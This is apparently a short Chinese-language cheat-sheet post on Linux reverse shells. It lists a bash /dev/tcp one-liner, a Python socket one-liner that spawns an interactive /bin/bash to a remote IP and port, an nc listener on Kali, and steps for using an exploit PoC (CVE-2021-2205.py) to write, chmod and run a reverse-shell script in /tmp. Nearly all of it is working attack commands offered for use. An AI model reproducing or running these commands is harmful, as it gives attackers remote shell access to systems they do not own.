linux反弹shell小记录

在某些情况下可能需要我们反弹一个shell来更好的执行某些命令。就可以用到这些命令：

Bash反弹shell命令如下：

bash -i >& /dev/tcp/ip/port 0>&1

使用python反弹，反弹shell命令如下：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先，使用nc在kali上监听端口：

nc -lvvp 7777

2021-11-10新增写文件反弹shell
反弹shell： (xxxx xxx xxx 代表运行POC的一些命令 然后 -c 后面是执行命令的地方）
xxxxxxx xxx xx -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh" 这条语句意思是代表，将反弹shell命令写成sh脚本 到tmp目录下
xxxx xxxx xxxx -c "chmod +x /tmp/1.sh" 这条语句意思是代表，对写入成功的sh脚本加执行权限 CVE-2021-2205.py xxx xxx xxxx xxxxxx -c "/bin/bash /tmp/1.sh" 这条语句意思是代表，运行反弹shell脚本